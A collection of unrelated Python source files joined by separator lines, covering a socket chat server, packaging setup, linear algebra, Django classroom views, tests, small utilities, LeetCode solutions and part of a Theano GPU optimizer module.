client.send('REFUSE'.encode('ascii'))
client.close()
continue
nicknames.append(nickname)
clients.append(client)
print(f'Nickname of the client is {nickname}')
broadcast(f'{nickname} joined the Chat'.encode('ascii'))
client.send('Connected to the Server!'.encode('ascii'))
# Handling Multiple Clients Simultaneously
thread = threading.Thread(target=handle, args=(client,))
thread.start()
def kick_user(name):
if name in nicknames:
name_index = nicknames.index(name)
client_to_kick = clients[name_index]
clients.remove(client_to_kick)
client_to_kick.send('You Were Kicked from Chat !'.encode('ascii'))
client_to_kick.close()
nicknames.remove(name)
broadcast(f'{name} was kicked from the server!'.encode('ascii'))
#Calling the main method
print('Server is Listening ...')
recieve() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Setuptools build system configuration file
for Faker Wi-Fi ESSID.
See https://setuptools.readthedocs.io.
"""
try:
from setuptools import setup, find_packages
except Exception as setuptools_not_present:
raise ImportError(
"Setuptools is required to install Faker Wi-Fi ESSID!"
) from setuptools_not_present
from codecs import open as fopen
from os.path import dirname, abspath, join
DIR = dirname(abspath(__file__))
VERSION = "0.3.1"
URL = "https://github.com/SkypLabs/faker-wifi-essid"
DL_URL = URL + "/archive/v{0}.zip"
with fopen(join(DIR, "README.rst"), encoding="utf-8") as f:
LONG_DESCRIPTION = f.read()
setup(
name="faker_wifi_essid",
version=VERSION,
description="Faker provider for Wi-Fi ESSIDs.",
long_description=LONG_DESCRIPTION,
license="MIT",
keywords="faker faker-library faker-provider faker-generator wifi essid",
author="Paul-Emmanuel Raoul",
author_email="skyper@skyplabs.net",
url=URL,
download_url=DL_URL.format(VERSION),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
],
packages=find_packages(
exclude=[
"doc*",
"test*",
],
),
python_requires=">=3.5, <4",
install_requires=[
"Faker >= 4.1,< 10.0",
],
extras_require={
"tests": [
"flake8",
"pylint",
"tox"
],
"docs": [
"Sphinx >= 3.2",
"sphinx_rtd_theme >= 0.5.0",
],
},
)
|
from pylinlin.matrix import Matrix
from pylinlin.matrix_view import MatrixView
from pylinlin.householder import Householder
def compute_qr_factorization(mat: Matrix) -> (Matrix, Matrix):
# Do not overwrite original matrix
mat = mat.copy()
householders = [] # store householder transformations
iterations = min(mat.num_rows(), mat.num_cols())
for iteration in range(iterations):
col = mat.get_col(iteration)
# Zero out the entries below the diagonal
hh = Householder(col[iteration:])
householders.append((iteration, hh))
mat = hh.multiply_left(mat, pad_top=iteration)
# Accumulate the householder transformations
q_mat = Matrix.identity(mat.num_rows())
for iteration, hh in householders[::-1]:
q_mat = hh.multiply_left(q_mat, pad_top=iteration)
return (q_mat, mat)
|
"""Exceptions for artifact I/O"""
from altimeter.core.exceptions import AltimeterException
class InvalidS3URIException(AltimeterException):
"""An S3 uri could not be parsed."""
|
from torch.utils.data import Sampler
class GroupLengthBatchSampler(Sampler):
def __init__(self, data_source, batch_size, batches_per_group=20):
super().__init__(data_source)
# TODO: your code here (optional)
raise NotImplementedError
def __iter__(self):
raise NotImplementedError
def __len__(self):
raise NotImplementedError
|
from tornado.websocket import WebSocketHandler
class SocketHandler(WebSocketHandler):
def __init__(self):
print("")
users = set() # 用来存放在线用户的容器
def open(self):
self.users.add(self) # 建立连接后添加用户到容器中
for u in self.users: # 向已在线用户发送消息
u.write_message("hello")
def on_message(self, message):
for u in self.users: # 向在线用户广播消息
u.write_message(u"hello2")
def on_close(self):
self.users.remove(self) # 用户关闭连接后从容器中移除用户
for u in self.users:
u.write_message("ffffff")
def check_origin(self, origin):
return True # 允许WebSocket的跨域请求
|
from sqlalchemy import create_engine, MetaData, Table
from tabref.searcher import TableSearcher
def connect_db(uri):
db = create_engine(uri)
meta = MetaData(bind=db)
meta.reflect(bind=db)
return meta
class SqlTableSearcher(TableSearcher):
def __init__(self, matcher, out_dir, db, table):
self.meta = db
self.table = Table(table, self.meta, autoload=True)
super(SqlTableSearcher, self).__init__(matcher, out_dir, table)
def rows(self):
rp = self.meta.bind.execute(self.table.select())
while True:
rows = rp.fetchmany(10000)
if rows is None or not len(rows):
break
for row in rows:
yield row
|
import uuid
from datetime import datetime
from django.shortcuts import render, redirect
from .models import Classroom, ClassroomStudents, ClassComments
from users.decorators import faculty_required, student_required
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from django.utils.datastructures import MultiValueDictKeyError
'''
Function to get all Classroom list details
'''
@login_required(login_url='/users/login')
def list(request):
user = request.user
# classroom list will be shown according to th user type
if user.isStudent:
classroomStudents = ClassroomStudents.objects.filter(student=user)
return render(request, './classroom/list.html', {'classroomStudents': classroomStudents})
else:
classrooms = Classroom.objects.filter(user=user)
return render(request, './classroom/list.html', {'classrooms': classrooms})
'''
Function to create Classroom
'''
@faculty_required()
def create(request):
if request.method == "GET":
return render(request, "classroom/create.html")
user = request.user
name = request.POST['name']
description = request.POST['description']
semester = request.POST['semester']
year = int(datetime.now().strftime('%Y'))
classroomCode = uuid.uuid4()
branch = request.POST['branch']
newClassroom = Classroom(user=user, name=name, description=description,
semester=semester, year=year,
classroomCode=classroomCode, branch=branch)
newClassroom.save()
return redirect('/classroom/')
'''
Function to get Classroom details
'''
@login_required(login_url='/users/login')
def view(request):
user = request.user
# if requested classroom not exists then
try:
classId = request.GET['id']
classroom = Classroom.objects.get(classId=classId)
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
# fetch all the class comments belonging to perticular classroom
comments = ClassComments.objects.filter(classroom=classroom)
if user.isStudent:
# if student has joined classroom then only it is to be viewed
try:
classroomStudent = ClassroomStudents.objects.get(student=user, classroom=classroom)
return render(request, './classroom/view.html', {'classroom': classroom, 'comments': comments})
except ObjectDoesNotExist:
return render(request, "accessDenied.html", {})
else:
# if faculty has created classroom then only it is to be viewed
if classroom.user == user:
return render(request, './classroom/view.html', {'classroom': classroom, 'comments': comments})
else:
return render(request, "accessDenied.html", {})
'''
Function to edit the Classroom details
'''
@faculty_required()
def edit(request):
if request.method == "GET":
# if classroom not exists
try:
classId = request.GET['id']
classroom = Classroom.objects.get(classId=classId)
# if classroom is not belonging to logged faculty user then
if classroom.user != request.user:
return render(request, 'accessDenied.html', {})
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
return render(request, "classroom/edit.html", {'classroom': classroom})
try:
classId = request.POST['classId']
classroom = Classroom.objects.get(classId=classId)
if classroom.user != request.user:
return render(request, 'accessDenied.html', {})
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
classroom.name = request.POST['name']
classroom.description = request.POST['description']
classroom.semester = request.POST['semester']
classroom.branch = request.POST['branch']
classroom.save()
return redirect('/classroom/')
'''
Function to delete particular Classroom
'''
@faculty_required()
def delete(request):
if request.method == "GET":
# if classroom not exists then
try:
classId = request.GET['id']
classroom = Classroom.objects.get(classId=classId)
# if classroom is not belonging to logged faculty user then
if classroom.user != request.user:
return render(request, 'accessDenied.html', {})
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
return render(request, "classroom/delete.html", {'classroom': classroom})
try:
classId = request.POST['classId']
classroom = Classroom.objects.get(classId=classId)
if classroom.user != request.user:
return render(request, 'accessDenied.html', {})
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
classroom.delete()
return redirect('/classroom/')
'''
Function to join classroom by Student
'''
@student_required()
def joinClassroom(request):
if request.method == "GET":
return render(request, "classroom/joinClassroom.html", {})
# if classroom code is not valid or classroom not exists then
try:
user = request.user
classroomCode = request.POST["classroomCode"]
classroom = Classroom.objects.get(classroomCode=classroomCode)
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
# if Student had already joined the same class then
try:
classroomStudent = ClassroomStudents.objects.get(classroom=classroom, student=user)
return render(request, "classroom/joinClassroom.html",
{"errorMessage": "You Have already Joined the Classroom"})
except ObjectDoesNotExist:
newClassroomStudent = ClassroomStudents(classroom=classroom, student=user)
newClassroomStudent.save()
return redirect('/classroom/')
'''
Function to leave classroom by Student
'''
@student_required()
def leaveClassroom(request):
user = request.user
if request.method == "GET":
# if requested classroom not exists then
try:
classId = request.GET['id']
classroom = Classroom.objects.get(classId=classId)
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
# if student has joined classroom then only it is to be viewed
try:
classroomStudent = ClassroomStudents.objects.get(student=user, classroom=classroom)
return render(request, './classroom/leaveClassroom.html', {'classroom': classroom})
except ObjectDoesNotExist:
return render(request, "accessDenied.html", {})
# if student haven't joined classroom or classroom not exists
try:
user = request.user
classroomCode = request.POST["classroomCode"]
classroom = Classroom.objects.get(classroomCode=classroomCode)
classroomStudent = ClassroomStudents.objects.get(classroom=classroom, student=user)
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
classroomStudent.delete()
return redirect('/classroom/')
'''
function to create the problem comments
'''
@login_required(login_url='/users/login')
def commentCreate(request):
# if requested classroom not exists then
try:
classId = request.POST['classId']
classroom = Classroom.objects.get(classId=classId)
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return render(request, '404.html', {})
comment = request.POST["comment"]
user = request.user
inputFile = request.FILES.get('inputFile')
newComment = ClassComments(comment=comment, user=user, classroom=classroom, attachmentPath=inputFile)
newComment.save()
return redirect('/classroom/view/?id' + "=" + classId)
|
import matplotlib.pyplot as plt
from pytest import mark, raises
from orbital_diagrams.api import EnergyOrbital
from orbital_diagrams.orbitals._base_orbital import BaseOrbital
from orbital_diagrams.plot import cycle_values, plotter, setup_axis, subplots
def test_setup_axis():
fig, ax = plt.subplots()
setup_axis(ax, None, xticks=range(100), xlim=(0, 100))
setup_axis(ax, "BaseOrbital")
setup_axis(ax, "EnergyOrbital")
setup_axis(ax, "ComboOrbital")
setup_axis(ax, "ComboEnergyOrbital")
setup_axis(ax, "ComboOrbitalGroup")
setup_axis(ax, "ComboEnergyOrbitalGroup")
with raises(NotImplementedError):
setup_axis(ax, "None")
def test_subplots():
assert len(subplots("BaseOrbital")) == 2
assert len(subplots("EnergyOrbital")[1]) == 1
assert subplots("ComboOrbital", 1, 4)[1].shape == (1, 4)
assert subplots("ComboEnergyOrbital", 3, 5)[1].shape == (3, 5)
@mark.xfail
def test_plotter(tmp_path):
fig, ((ax,),) = subplots("BaseOrbital")
plotter(
[BaseOrbital(), BaseOrbital(), BaseOrbital()],
title="Hello World",
style="BaseOrbital",
plot=(fig, ax),
xlim=(0, 2),
xticks_minor=True,
yticks_minor=2,
legend=True,
colors=None,
markers=None,
linestyles=None,
savefig=f"{tmp_path}/BaseOrbitals.png",
)
plotter(
[EnergyOrbital(-1), EnergyOrbital(-2), EnergyOrbital(-3)],
title="World",
style="EnergyOrbital",
plot=None,
xlim=None,
xticks=None,
xticks_minor=1,
yticks_minor=True,
legend=False,
alphas=[0.9, 0.1],
colors=["b", "k"],
markers="x",
linestyles=["-", ":"],
savefig=f"{tmp_path}/",
)
plotter(
[],
title="Hello",
style=type(BaseOrbital()).__name__,
plot=None,
xlim=None,
xticks=None,
legend=True,
colors=None,
markers=None,
linestyles=None,
savefig=f"{tmp_path}/",
)
plotter(
[],
title="Hello",
style=None,
plot=None,
xlim=(0, 10),
xticks=None,
legend=False,
colors=None,
markers="+",
linestyles="--",
savefig=f"{tmp_path}/",
)
plotter(
[],
title="Hello",
style=None,
plot=None,
xlim=(0, 10),
xticks=None,
ylim=(0, 10),
yticks=(0, 5, 10),
yticks_minor=True,
legend=False,
colors=None,
alphas=0.5,
markers="+",
linestyles="--",
savefig=f"{tmp_path}/",
)
with raises(NotImplementedError):
plotter([], style="QWERTY")
def test_cycle_values():
assert next(cycle_values(None)) is None
assert next(cycle_values(1)) == 1
it = cycle_values([0, 1, 2])
assert next(it) == 0
assert next(it) == 1
assert next(it) == 2
assert next(it) == 0
|
"""
Author: Rômulo do Carmo Sousa
Description: Remove todos os arquivos terminados em '(1)'
Date: 12-11-2020
"""
import os
import re
import time
# Cores ASCII
ciano_claro = "\033[1;96m"
verde = "\033[1;32m"
vermelho = "\033[1;31m"
reset = "\033[0;0m"
def repeated_files(files):
"""Retrona uma lista com os arquivos repetidos"""
repeated = []
for file in files:
match = re.findall(r".*\(1\)$", file)
if match:
repeated.extend(match)
return repeated
def remove():
"""Remove os arquivos"""
repeated = repeated_files(os.listdir())
length = len(repeated)
print(f"{verde}Arquivos duplicados: {vermelho}{length}{reset}\n")
if not repeated:
print(f"{ciano_claro}✔ Não existe trabalho aqui ✨{reset}")
return
for file in repeated:
print(f"{vermelho}✖ {verde}Removendo o arquivo: {vermelho}{file}{reset}")
time.sleep(0.1)
os.remove(file)
print(f"{verde}✔ Arquivo removido!{reset}")
print(f"{ciano_claro}✔ Tudo limpinho ✨{reset}")
if __name__ == "__main__":
remove()
|
#!/usr/bin/env python3
import datetime
from common.params import Params
from selfdrive.data_collection import gps_uploader
print("Don't forget to pray!")
params = Params()
t = datetime.datetime.utcnow().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("IsOffroad") == b"1":
print("Please wait for gps to upload to aviod this in future!")
gps_uploader.upload_data()
else:
print("Please switch off car and try again!")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Defines a unary natural number (Peano natural number) abstract
data type for Relay and provides some utility functions for it.
Nats are useful for testing purposes, as they make it easy to write
test cases for recursion and pattern matching."""
from tvm.relay.backend.interpreter import ConstructorValue
def get_type(prelude, name):
ty_var = prelude.mod.get_global_type_var(name)
ty_data = prelude.mod.type_definitions[ty_var]
return tuple([ty_var] + list(ty_data.constructors))
def count(prelude, n):
"""Takes a ConstructorValue corresponding to a nat ADT
and converts it into a Python integer. This is an example of
using an ADT value in Python.
"""
assert isinstance(n, ConstructorValue)
_, z, s = prelude.mod.get_type("nat")
if n.tag == z.tag:
return 0
assert n.tag == s.tag
return 1 + count(prelude, n.fields[0])
def make_nat_value(prelude, n):
"""The inverse of count(): Given a non-negative Python integer,
constructs a ConstructorValue representing that value as a nat.
"""
_, z, s = prelude.mod.get_type("nat")
if n == 0:
return ConstructorValue(z.tag, [], z)
return ConstructorValue(s.tag, [make_nat_value(prelude, n - 1)], s)
def make_nat_expr(prelude, n):
"""Given a non-negative Python integer, constructs a Python
expression representing that integer's value as a nat.
"""
assert n >= 0
_, z, s = prelude.mod.get_type("nat")
ret = z()
while n > 0:
ret = s(ret)
n = n - 1
return ret
|
""" ci """
from sandboxes.scripts.creators.ci.create_answers import *
from sandboxes.scripts.creators.ci.create_questions import *
from utils.logger import logger
def create_sandbox():
logger.info('create_ci_sandbox...')
create_questions()
create_answers()
logger.info('create_ci_sandbox...Done.')
|
"""
A wrap python class of 'pbsnodes -N "note" node' command
The purpose of this class is to provide a simple API
to write some attribute and its value pairs to note attribute of cluster nodes.
"""
from __future__ import print_function
from sh import ssh
from ast import literal_eval
from types import *
from copy import deepcopy
from cloudmesh.pbs.pbs import PBS
from cloudmesh.inventory import Inventory
import json
from cloudmesh_base.logger import LOGGER
# ----------------------------------------------------------------------
# SETTING UP A LOGGER
# ----------------------------------------------------------------------
log = LOGGER(__file__)
class pbs_note_builder:
def __init__(self, user, host):
self.username = user
self.hostname = host
self.inventory = Inventory()
self.fetch_pbs_nodes_info()
self.pbs_nodes_info = None
# get recent pbsnodes info
def fetch_pbs_nodes_info(self):
pbs = PBS(self.username, self.hostname)
self.pbs_nodes_info = pbs.pbsnodes()
# print self.pbs_nodes_info
def check_node_validation(self, node):
node_id_label = self.inventory.get_host_id_label(node)
berror = False
if node_id_label is None:
berror = True
else:
(node_id, node_label) = node_id_label
if not berror:
if node_label not in self.pbs_nodes_info.keys():
berror = True
if berror:
raise NameError(
"pbs_note_builder: '{0}' is NOT a valid or existed node.".format(node))
return node_id_label
def get_note(self, node):
(node_id, node_label) = self.check_node_validation(node)
print("{0}-note: {1}".format(node_id, self.pbs_nodes_info[node_label]["note"]))
# node is the server name, e.g., i129, i15
# note is a dict, {"attr1": "value1", "attr2": "value2"}
# setNote doesn't check the correctness of the attribute-value pair
def set_note(self, node, note):
(node_id, node_label) = self.check_node_validation(node)
# ["note"] ONLY has two type: dict or string
prev_note = self.pbs_nodes_info[node_label]["note"]
if type(prev_note) is dict:
curr_note = deepcopy(prev_note)
else:
# assume the default note is for 'service'
curr_note = {"service": deepcopy(prev_note)}
# now curr_note already is a dict
# to keep consistency, the keys in note should be lower
map(lambda x: str(x).lower(), note.keys())
curr_note.update(note)
# convert the dict to a unique string
# e.g., "'other': 'test', 'temperature': '10.2', 'service': 'hpc'"
# kvpair_list = ", ".join([": ".join(map(lambda x: "'".join(["", str(x), ""]), [key, prev_note[key]])) for key in sorted(prev_note.keys())])
# snote = "".join(['{', kvpair_list, '}'])
# sshnote = '"'.join(["", snote, ""])
# try get the dict string with json dumps
sshnote = json.dumps(curr_note)
# update the note attribute in memory to real node
command = " ".join(["pbsnodes -N", sshnote, node_label])
str_ssh = "@".join([self.username, self.hostname])
log.debug("pbs_note_builder: command ready to execute is: \n > ssh {0} {1}\n".format(
str_ssh, command))
# This operation NEED authorization ...
# ssh(str_ssh, command)
# set server's temperature
# a shortcut of set_note
def set_temperature_note(self, node, temp):
self.set_one_note(node, "temperature", temp)
# set server's service type
# a shortcut of set_note
def set_service_note(self, node, service):
self.set_one_note(node, "service", service)
def set_one_note(self, node, attr, value):
self.set_note(node, {attr: value})
# test only
if __name__ == "__main__":
# only used for test
username = "change me"
hostname = "change me"
pbsnote = pbs_note_builder(username, "india")
try:
pbsnote.get_note(hostname)
# test temperature
pbsnote.set_temperature_note(hostname, 99.2)
# test service type
pbsnote.set_service_note(hostname, "down")
# test setNote
note = {"service": "down, offline",
"temperature": "-100.12", "test": "debug", 0: 12}
pbsnote.set_note(hostname, note)
except NameError, ne:
print("My exception info: ")
print(str(ne))
|
#repaso
a = int(input("Ingrese un numero "))
b = int(input("ingrese otro numero "))
c = a + b
if c < 10:
print('Su numero es menor que 10 ')
elif c > 10:
print('Su numero es mayor que 10 ')
elif c == 10:
print('Su numero es 10 ')
print('Su numero es: ', c)
input('Pulse enter para continuar...') |
"""
https://leetcode-cn.com/problems/open-the-lock/
https://leetcode-cn.com/problems/open-the-lock/solution/da-kai-zhuan-pan-suo-by-leetcode/
https://leetcode-cn.com/problems/open-the-lock/solution/python-bfs-qing-xi-ti-jie-by-knifezhu/
"""
from queue import Queue
from typing import List
class Solution:
def openLock(self, deadends: List[str], target: str) -> int:
# in 操作在 set 中时间复杂度为 O(1)
deadends = set(deadends)
if '0000' in deadends:
return -1
q = Queue()
q.put(('0000', 0))
while not q.empty():
node, step = q.get()
for i in range(4):
for add in (1, -1):
cur = node[:i] + str((int(node[i]) + add) % 10) + node[i + 1:]
if cur == target:
return step + 1
if cur not in deadends:
q.put((cur, step + 1))
deadends.add(cur)
return -1
|
"""Functions for graph-level featurization of the sequence of a protein. This submodule is focussed on physicochemical
proporties of the sequence."""
# %%
# Graphein
# Author: Arian Jamasb <arian@jamasb.io>, Eric Ma
# License: MIT
# Project Website: https://github.com/a-r-j/graphein
# Code Repository: https://github.com/a-r-j/graphein
from __future__ import annotations
from functools import partial
import networkx as nx
from Bio import SeqUtils
from multipledispatch import dispatch
from networkx import Graph
from graphein.protein.features.sequence.utils import (
aggregate_feature_over_chains,
compute_feature_over_chains,
)
# from graphein.protein.features.utils import aggregate_graph_feature_over_chains
@dispatch(str, str)
def molecular_weight(protein: str, seq_type: str = "protein"):
func = partial(SeqUtils.molecular_weight, seq_type=seq_type)
return func(protein)
@dispatch(nx.Graph, seq_type=str)
def molecular_weight(protein, seq_type: str = "protein"):
func = partial(SeqUtils.molecular_weight, seq_type=seq_type)
G = compute_feature_over_chains(
protein, func, feature_name="molecular_weight"
)
return G
|
from .WS2801Wrapper import WS2801Wrapper
from threading import Thread, Event
def __wait_for__input(event: Event):
input()
event.set()
def run_effect(target, additional_args=None):
event = Event()
pixels = WS2801Wrapper()
pixels.clear()
pixels.show()
args = (pixels, event) + additional_args if additional_args else (pixels, event)
t1 = Thread(target=target, name="Effect", args=args)
t1.start()
t2 = Thread(target=__wait_for__input, name='Input', args=(event,))
t2.start()
t1.join()
t2.join()
|
from __future__ import absolute_import
from elixir import Entity, ManyToOne, OneToMany, ManyToMany, using_options
class A1(Entity):
using_options(resolve_root='tests.db1')
a2s = OneToMany('A2')
bs = ManyToMany('b.B')
class A2(Entity):
a1 = ManyToOne('A1')
|
#!/usr/bin/env python
"""
The appropriate bookmarklet for testing is therefore:
javascript:(
function(){
var script = document.createElement('script');
var child = document.body.appendChild(script);
child.src = 'http://127.0.0.1:8001/bookmarklet.js';
}
)();
or, minified:
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://127.0.0.1:8001/bookmarklet.js';})();
This will call this server and grab the built js and css to inject onto the
current page, if it is an arxiv abstract page.
"""
import os
import json
import string
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
PORT = 8001
class AtTemplate(string.Template):
delimiter = '@'
def create_bookmarklet():
build_path = os.path.join(os.path.abspath(os.path.curdir), 'build')
script_path = os.path.dirname(os.path.abspath(__file__))
template = os.path.join(script_path, 'bookmarklet.js')
manifest = os.path.join(build_path, 'asset-manifest.json')
return bookmarklet_text(template, manifest)
def bookmarklet_text(template, manifest):
filenames = list(json.load(open(manifest)).values())
tpl = AtTemplate(open(template).read())
return tpl.substitute(filenames=filenames, port=PORT)
class FlexibleBookmarklet(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path != '/bookmarklet.js':
return super(FlexibleBookmarklet, self).do_GET()
content = create_bookmarklet()
self.send_response(200)
self.send_header('Content-type', 'text/javascript')
self.end_headers()
self.wfile.write(content.encode('utf-8'))
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
test(FlexibleBookmarklet, HTTPServer, port=PORT)
|
import copy
import theano
import numpy
from theano import tensor, scalar
from theano.compile import optdb
from theano.gof import (local_optimizer, EquilibriumDB,
SequenceDB, ProxyDB,
Optimizer, toolbox, DestroyHandler,
InconsistencyError, EquilibriumOptimizer)
from theano.gof.python25 import all, any
from theano.tensor.nnet.conv import ConvOp
from theano.sandbox.gpuarray.type import GpuArrayType
from theano.sandbox.gpuarray.basic_ops import (host_from_gpu,
gpu_from_host,
gpu_alloc,
GpuAlloc,
GpuReshape,
GpuEye)
from theano.sandbox.gpuarray.blas import gpu_dot22, GpuGemv, GpuGemm
from theano.sandbox.gpuarray.conv import GpuConv
from theano.sandbox.gpuarray.nnet import (GpuCrossentropySoftmaxArgmax1HotWithBias,
GpuCrossentropySoftmax1HotWithBiasDx,
GpuSoftmaxWithBias,
GpuSoftmax)
from theano.sandbox.gpuarray.elemwise import (GpuElemwise, _is_scalar,
GpuDimShuffle, GpuCAReduceCuda)
from theano.sandbox.gpuarray.subtensor import GpuIncSubtensor, GpuSubtensor
from theano.sandbox.gpuarray.type import GpuArrayConstant
gpu_optimizer = EquilibriumDB()
gpu_cut_copies = EquilibriumDB()
gpu_seqopt = SequenceDB()
gpu_seqopt.register('gpuarray_local_optimiziations', gpu_optimizer, 1,
'fast_run', 'inplace', 'gpuarray')
gpu_seqopt.register('gpuarray_cut_transfers', gpu_cut_copies, 2,
'fast_run', 'gpuarray')
# do not add 'fast_run' to these two as this would always enable gpuarray mode
optdb.register('gpuarray_opt', gpu_seqopt,
optdb.__position__.get('add_destroy_handler', 49.5) - 1,
'gpuarray')
def register_opt(*tags, **kwargs):
def f(local_opt):
name = (kwargs and kwargs.pop('name')) or local_opt.__name__
gpu_optimizer.register(name, local_opt, 'fast_run', 'gpuarray', *tags)
return local_opt
return f
register_opt()(theano.tensor.opt.local_track_shape_i)
def op_lifter(OP):
"""
OP(..., host_from_gpu(), ...) -> host_from_gpu(GpuOP(...))
gpu_from_host(OP(inp0, ...)) -> GpuOP(inp0, ...)
"""
def f(maker):
def local_opt(node):
if type(node.op) in OP:
# Either one of our inputs is on the gpu or
# all of our client are on the gpu
if (any([i.owner and i.owner.op == host_from_gpu
for i in node.inputs]) or
all([c != 'output' and c.op == gpu_from_host
for c, idx in node.outputs[0].clients])):
new_op = maker(node)
# This is needed as sometimes new_op inherit from OP.
if new_op and new_op != node.op:
if isinstance(new_op, theano.Op):
return [host_from_gpu(o) for o in
new_op(*node.inputs, return_list=True)]
elif isinstance(new_op, (tuple, list)):
return [host_from_gpu(o) for o in new_op]
else: # suppose it is a variable on the GPU
return [host_from_gpu(new_op)]
return False
local_opt.__name__ = maker.__name__
return local_optimizer(OP)(local_opt)
return f
class InputToGpuOptimizer(Optimizer):
"Transfer the input to the gpu to start the rolling wave."
def add_requirements(self, fgraph):
fgraph.attach_feature(toolbox.ReplaceValidate())
fgraph.attach_feature(DestroyHandler())
def apply(self, fgraph):
for input in fgraph.inputs:
if isinstance(input.type, GpuArrayType):
continue
if (len(input.clients) == 1 and
(input.clients[0][0] == 'output' or
input.clients[0][0].op == gpu_from_host)):
continue
try:
new_input = host_from_gpu(gpu_from_host(input))
fgraph.replace_validate(input, new_input,
"InputToGpuOptimizer")
except TypeError, e:
# This could fail if the inputs are not TensorTypes
pass
gpu_seqopt.register('InputToGpuArrayOptimizer', InputToGpuOptimizer(),
0, 'fast_run', 'fast_compile', 'merge')
@local_optimizer([gpu_from_host, host_from_gpu])
def local_cut_gpu_host_gpu(node):
if tensor.opt.opt.check_chain(node, gpu_from_host, host_from_gpu):
return [node.inputs[0].owner.inputs[0]]
if tensor.opt.opt.check_chain(node, host_from_gpu, gpu_from_host):
return [node.inputs[0].owner.inputs[0]]
return False
gpu_cut_copies.register('cut_gpua_host_transfers', local_cut_gpu_host_gpu,
'fast_run', 'inplace', 'gpuarray')
gpu_cut_copies.register('cut_gpua_constant_transfers',
tensor.opt.constant_folding,
'fast_run', 'gpuarray')
optdb['canonicalize'].register('local_cut_gpua_host_gpua',
local_cut_gpu_host_gpu, 'fast_run', 'gpuarray')
@register_opt()
@op_lifter([tensor.Alloc])
def local_gpualloc(node):
return gpu_alloc
@register_opt()
@local_optimizer([GpuAlloc])
def local_gpualloc_memset_0(node):
if isinstance(node.op, GpuAlloc) and not node.op.memset_0:
inp = node.inputs[0]
if (isinstance(inp, GpuArrayConstant) and
inp.data.size == 1 and
(numpy.asarray(inp.data) == 0).all()):
new_out = GpuAlloc(memset_0=True)(*node.inputs)
return [new_out]
@register_opt()
@op_lifter([tensor.Reshape])
def local_gpureshape(node):
op = node.op
name = op.name
if name:
name = 'Gpu' + name
res = GpuReshape(op.ndim, op.name)
return res
@register_opt()
@op_lifter([tensor.Flatten])
def local_gpuflatten(node):
op = node.op
shp =[]
if op.outdim != 1:
shp = [node.inputs[0].shape[i] for i in range(op.outdim - 1)]
shp += [-1]
res = GpuReshape(op.outdim, None)
o = res(node.inputs[0], theano.tensor.as_tensor_variable(shp))
return o
@register_opt()
@op_lifter([tensor.Elemwise])
def local_gpu_elemwise(node):
op = node.op
name = op.name
if node.outputs[0].ndim == 0:
return
if name:
name = 'Gpu'+name
res = GpuElemwise(op.scalar_op, name=name,
inplace_pattern=copy.copy(op.inplace_pattern),
nfunc_spec=op.nfunc_spec)
return res
def max_inputs_to_GpuElemwise(node):
ptr_size = 8
int_size = 4
# we take the limit from CUDA for now
argument_limit = 232
ndim = node.inputs[0].type.ndim
# number of elements and shape
size_param_mandatory = (int_size * (ndim + 1)) + \
(ptr_size + int_size * ndim) * len(node.outputs)
nb_bytes_avail = argument_limit - size_param_mandatory
nb_bytes_per_input = ptr_size + ndim * int_size
max_nb_inputs = nb_bytes_avail // nb_bytes_per_input
return max_nb_inputs
gpu_local_elemwise_fusion = tensor.opt.local_elemwise_fusion_op(
GpuElemwise,
max_inputs_to_GpuElemwise)
optdb.register('gpua_elemwise_fusion',
tensor.opt.FusionOptimizer(gpu_local_elemwise_fusion), 71.00,
'fast_run', 'fusion', 'local_elemwise_fusion', 'gpuarray')
inplace_gpu_elemwise_opt = tensor.opt.inplace_elemwise_optimizer_op(
GpuElemwise)
optdb.register('gpua_inplace_opt', inplace_gpu_elemwise_opt, 75,
'inplace_elemwise_optimizer', 'fast_run', 'inplace', 'gpuarray')
@register_opt()
@op_lifter([tensor.DimShuffle])
def local_gpua_dimshuffle(node):
return GpuDimShuffle(node.op.input_broadcastable,
node.op.new_order)
@register_opt()
@op_lifter([tensor.SpecifyShape])
def local_gpua_specifyShape(node):
return tensor.specify_shape
@register_opt()
@op_lifter([tensor.Subtensor])
def local_gpua_subtensor(node):
return GpuSubtensor(node.op.idx_list)
@register_opt()
@op_lifter([tensor.IncSubtensor])
def local_gpua_incsubtensor(node):
return GpuIncSubtensor(node.op.idx_list, node.op.inplace,
node.op.set_instead_of_inc,
node.op.destroyhandler_tolerate_aliased)
@register_opt()
@op_lifter([tensor.CAReduce, tensor.Sum])
def local_gpua_careduce(node):
